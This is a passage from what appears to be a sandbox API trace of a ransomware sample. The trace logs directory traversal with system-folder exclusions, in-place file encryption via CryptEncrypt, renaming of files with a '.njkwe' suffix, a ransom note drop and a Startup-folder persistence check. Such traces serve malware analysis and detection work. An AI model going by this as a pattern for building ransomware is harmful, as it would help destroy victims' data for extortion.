ftLastWriteTime.dwHighDateTime=0x1d0d7e6, nFileSizeHigh=0x0, nFileSizeLow=0xd77c4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="stream.x64.en-us.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 1 [0068.001] lstrcmpiW (lpString1="stream.x64.en-us.man.dat", lpString2="Windows") returned -1 [0068.001] lstrcmpiW (lpString1="stream.x64.en-us.man.dat", lpString2="$Recycle.bin") returned 1 [0068.001] lstrcmpiW (lpString1="stream.x64.en-us.man.dat", lpString2="System Volume Information") returned -1 [0068.001] lstrcmpiW (lpString1="stream.x64.en-us.man.dat", lpString2="Program Files") returned 1 [0068.001] lstrcmpiW (lpString1="stream.x64.en-us.man.dat", lpString2="Program Files (x86)") returned 1 [0068.001] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\en-us.16\\stream.x64.en-us.man.dat") returned 110 [0068.001] StrStrIW (lpFirst="stream.x64.en-us.man.dat", lpSrch=".njkwe") returned 0x0 [0068.001] lstrcmpW (lpString1="stream.x64.en-us.man.dat", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0068.001] lstrcmpW (lpString1="stream.x64.en-us.man.dat", lpString2="taridd") returned -1 [0068.001] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\en-us.16\\stream.x64.en-us.man.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0068.001] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\201eb7df-c721-4b8b-9c81-a09de7f931e6\\en-us.16\\stream.x64.en-us.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0068.001] GetTickCount () returned 0x1151643 [0068.001] GetTickCount () returned 0x1151643 [0068.001] GetTickCount () returned 0x1151643 [0068.001] GetTickCount () returned 0x1151643 [0068.002] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0068.002] GetProcessHeap () returned 0xbe0000 [0068.002] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc49830 [0068.002] ReadFile (in: hFile=0x438, lpBuffer=0xc49830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesRead=0x380f04c*=0x2800, lpOverlapped=0x0) returned 1 [0068.005] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.005] WriteFile (in: hFile=0x438, lpBuffer=0xc49830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesWritten=0x380f04c*=0x2800, lpOverlapped=0x0) returned 1 [0068.005] GetProcessHeap () returned 0xbe0000 [0068.005] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc49830 | out: hHeap=0xbe0000) returned 1 [0068.005] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.005] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0068.007] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0068.007] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0068.007] CloseHandle (hObject=0x438) returned 1 [0068.007] GetProcessHeap () returned 0xbe0000 [0068.008] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc486f0 [0068.008] wnsprintfW (in: pszDest=0xc486f0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\en-us.16\\stream.x64.en-us.man.dat_r00t_{3sXlE5}.njkwe") returned 130 [0068.008] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\201eb7df-c721-4b8b-9c81-a09de7f931e6\\en-us.16\\stream.x64.en-us.man.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\en-us.16\\stream.x64.en-us.man.dat_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\201eb7df-c721-4b8b-9c81-a09de7f931e6\\en-us.16\\stream.x64.en-us.man.dat_r00t_{3sxle5}.njkwe")) returned 1 [0068.008] GetProcessHeap () returned 0xbe0000 [0068.008] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc486f0 | out: hHeap=0xbe0000) returned 1 [0068.008] FindNextFileW (in: hFindFile=0xc19ee0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82f73dd4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x82f73dd4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdcc39700, ftLastWriteTime.dwHighDateTime=0x1d0d7e6, nFileSizeHigh=0x0, nFileSizeLow=0xd77c4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="stream.x64.en-us.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 0 [0068.008] FindClose (in: hFindFile=0xc19ee0 | out: hFindFile=0xc19ee0) returned 1 [0068.008] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\en-us.16\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 117 [0068.008] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\en-us.16\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\clicktorun\\201eb7df-c721-4b8b-9c81-a09de7f931e6\\en-us.16\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0068.009] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0068.009] CloseHandle (hObject=0x434) returned 1 [0068.009] GetProcessHeap () returned 0xbe0000 [0068.009] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0068.010] FindNextFileW (in: hFindFile=0xc19d20, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82f9a029, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8300c739, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8300c739, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="x-none.16", cAlternateFileName="")) returned 1 [0068.010] lstrcmpiW (lpString1="x-none.16", lpString2="Windows") returned 1 [0068.010] lstrcmpiW (lpString1="x-none.16", lpString2="$Recycle.bin") returned 1 [0068.010] lstrcmpiW (lpString1="x-none.16", lpString2="System Volume Information") returned 1 [0068.010] lstrcmpiW (lpString1="x-none.16", lpString2="Program Files") returned 1 [0068.010] lstrcmpiW (lpString1="x-none.16", lpString2="Program Files (x86)") returned 1 [0068.010] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\x-none.16") returned 86 [0068.010] lstrcmpW (lpString1="x-none.16", lpString2=".") returned 1 [0068.010] lstrcmpW (lpString1="x-none.16", lpString2="..") returned 1 [0068.010] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\x-none.16", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0068.010] GetProcessHeap () returned 0xbe0000 [0068.010] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0068.010] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\x-none.16\\*") returned 88 [0068.010] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\x-none.16\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82f9a029, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8300c739, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8300c739, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ca0 [0068.399] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0068.399] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0068.399] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0068.399] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0068.399] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0068.399] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\x-none.16\\.") returned 88 [0068.399] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0068.399] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82f9a029, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8300c739, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8300c739, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0068.399] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0068.399] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0068.399] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0068.399] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0068.399] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0068.399] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\x-none.16\\..") returned 89 [0068.399] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0068.399] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0068.399] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82fc026f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x82fc026f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd54fbe00, ftLastWriteTime.dwHighDateTime=0x1d0d7e5, nFileSizeHigh=0x0, nFileSizeLow=0x5211, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MasterDescriptor.x-none.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0068.399] lstrcmpiW (lpString1="MasterDescriptor.x-none.xml", lpString2="Windows") returned -1 [0068.399] lstrcmpiW (lpString1="MasterDescriptor.x-none.xml", lpString2="$Recycle.bin") returned 1 [0068.399] lstrcmpiW (lpString1="MasterDescriptor.x-none.xml", lpString2="System Volume Information") returned -1 [0068.399] lstrcmpiW (lpString1="MasterDescriptor.x-none.xml", lpString2="Program Files") returned -1 [0068.399] lstrcmpiW (lpString1="MasterDescriptor.x-none.xml", lpString2="Program Files (x86)") returned -1 [0068.399] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\x-none.16\\MasterDescriptor.x-none.xml") returned 114 [0068.399] StrStrIW (lpFirst="MasterDescriptor.x-none.xml", lpSrch=".njkwe") returned 0x0 [0068.399] lstrcmpW (lpString1="MasterDescriptor.x-none.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0068.399] lstrcmpW (lpString1="MasterDescriptor.x-none.xml", lpString2="taridd") returned -1 [0068.399] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\x-none.16\\MasterDescriptor.x-n", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0068.399] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\201eb7df-c721-4b8b-9c81-a09de7f931e6\\x-none.16\\masterdescriptor.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0068.400] GetTickCount () returned 0x11517ca [0068.400] GetTickCount () returned 0x11517ca [0068.400] GetTickCount () returned 0x11517ca [0068.400] GetTickCount () returned 0x11517ca [0068.400] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0068.400] GetProcessHeap () returned 0xbe0000 [0068.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc49830 [0068.400] ReadFile (in: hFile=0x438, lpBuffer=0xc49830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesRead=0x380f04c*=0x2800, lpOverlapped=0x0) returned 1 [0068.405] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.405] WriteFile (in: hFile=0x438, lpBuffer=0xc49830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesWritten=0x380f04c*=0x2800, lpOverlapped=0x0) returned 1 [0068.406] GetProcessHeap () returned 0xbe0000 [0068.406] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc49830 | out: hHeap=0xbe0000) returned 1 [0068.406] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.406] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0068.449] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0068.449] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0068.449] CloseHandle (hObject=0x438) returned 1 [0068.449] GetProcessHeap () returned 0xbe0000 [0068.449] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc486f0 [0068.450] wnsprintfW (in: pszDest=0xc486f0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\x-none.16\\MasterDescriptor.x-none.xml_r00t_{3sXlE5}.njkwe") returned 134 [0068.450] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\201eb7df-c721-4b8b-9c81-a09de7f931e6\\x-none.16\\masterdescriptor.x-none.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\x-none.16\\MasterDescriptor.x-none.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\201eb7df-c721-4b8b-9c81-a09de7f931e6\\x-none.16\\masterdescriptor.x-none.xml_r00t_{3sxle5}.njkwe")) returned 1 [0068.450] GetProcessHeap () returned 0xbe0000 [0068.450] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc486f0 | out: hHeap=0xbe0000) returned 1 [0068.450] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82fc026f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x82fc026f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfe714e00, ftLastWriteTime.dwHighDateTime=0x1d0d7e7, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="s640.hash", cAlternateFileName="S640~1.HAS")) returned 1 [0068.450] lstrcmpiW (lpString1="s640.hash", lpString2="Windows") returned -1 [0068.450] lstrcmpiW (lpString1="s640.hash", lpString2="$Recycle.bin") returned 1 [0068.450] lstrcmpiW (lpString1="s640.hash", lpString2="System Volume Information") returned -1 [0068.450] lstrcmpiW (lpString1="s640.hash", lpString2="Program Files") returned 1 [0068.450] lstrcmpiW (lpString1="s640.hash", lpString2="Program Files (x86)") returned 1 [0068.450] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\x-none.16\\s640.hash") returned 96 [0068.450] StrStrIW (lpFirst="s640.hash", lpSrch=".njkwe") returned 0x0 [0068.450] lstrcmpW (lpString1="s640.hash", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0068.450] lstrcmpW (lpString1="s640.hash", lpString2="taridd") returned -1 [0068.451] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\x-none.16\\s640.hash", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0068.451] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\x-none.16\\s640.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\201eb7df-c721-4b8b-9c81-a09de7f931e6\\x-none.16\\s640.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0068.451] GetTickCount () returned 0x11517f9 [0068.451] GetTickCount () returned 0x11517f9 [0068.451] GetTickCount () returned 0x11517f9 [0068.451] GetTickCount () returned 0x11517f9 [0068.451] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0068.451] GetProcessHeap () returned 0xbe0000 [0068.451] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc49830 [0068.451] ReadFile (in: hFile=0x438, lpBuffer=0xc49830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesRead=0x380f04c*=0x66, lpOverlapped=0x0) returned 1 [0068.452] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffff9a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.452] WriteFile (in: hFile=0x438, lpBuffer=0xc49830*, nNumberOfBytesToWrite=0x66, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesWritten=0x380f04c*=0x66, lpOverlapped=0x0) returned 1 [0068.453] GetProcessHeap () returned 0xbe0000 [0068.453] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc49830 | out: hHeap=0xbe0000) returned 1 [0068.453] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.453] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0068.454] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0068.454] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0068.454] CloseHandle (hObject=0x438) returned 1 [0068.454] GetProcessHeap () returned 0xbe0000 [0068.454] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc486f0 [0068.454] wnsprintfW (in: pszDest=0xc486f0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\x-none.16\\s640.hash_r00t_{3sXlE5}.njkwe") returned 116 [0068.454] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\x-none.16\\s640.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\201eb7df-c721-4b8b-9c81-a09de7f931e6\\x-none.16\\s640.hash"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\x-none.16\\s640.hash_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\201eb7df-c721-4b8b-9c81-a09de7f931e6\\x-none.16\\s640.hash_r00t_{3sxle5}.njkwe")) returned 1 [0068.455] GetProcessHeap () returned 0xbe0000 [0068.455] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc486f0 | out: hHeap=0xbe0000) returned 1 [0068.455] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82fc026f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x82fc026f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfe714e00, ftLastWriteTime.dwHighDateTime=0x1d0d7e7, nFileSizeHigh=0x0, nFileSizeLow=0x38480a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="stream.x64.x-none.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 1 [0068.455] lstrcmpiW (lpString1="stream.x64.x-none.man.dat", lpString2="Windows") returned -1 [0068.455] lstrcmpiW (lpString1="stream.x64.x-none.man.dat", lpString2="$Recycle.bin") returned 1 [0068.455] lstrcmpiW (lpString1="stream.x64.x-none.man.dat", lpString2="System Volume Information") returned -1 [0068.455] lstrcmpiW (lpString1="stream.x64.x-none.man.dat", lpString2="Program Files") returned 1 [0068.455] lstrcmpiW (lpString1="stream.x64.x-none.man.dat", lpString2="Program Files (x86)") returned 1 [0068.455] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\x-none.16\\stream.x64.x-none.man.dat") returned 112 [0068.455] StrStrIW (lpFirst="stream.x64.x-none.man.dat", lpSrch=".njkwe") returned 0x0 [0068.455] lstrcmpW (lpString1="stream.x64.x-none.man.dat", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0068.455] lstrcmpW (lpString1="stream.x64.x-none.man.dat", lpString2="taridd") returned -1 [0068.455] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\x-none.16\\stream.x64.x-none.ma", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0068.455] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\201EB7DF-C721-4B8B-9C81-A09DE7F931E6\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\201eb7df-c721-4b8b-9c81-a09de7f931e6\\x-none.16\\stream.x64.x-none.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 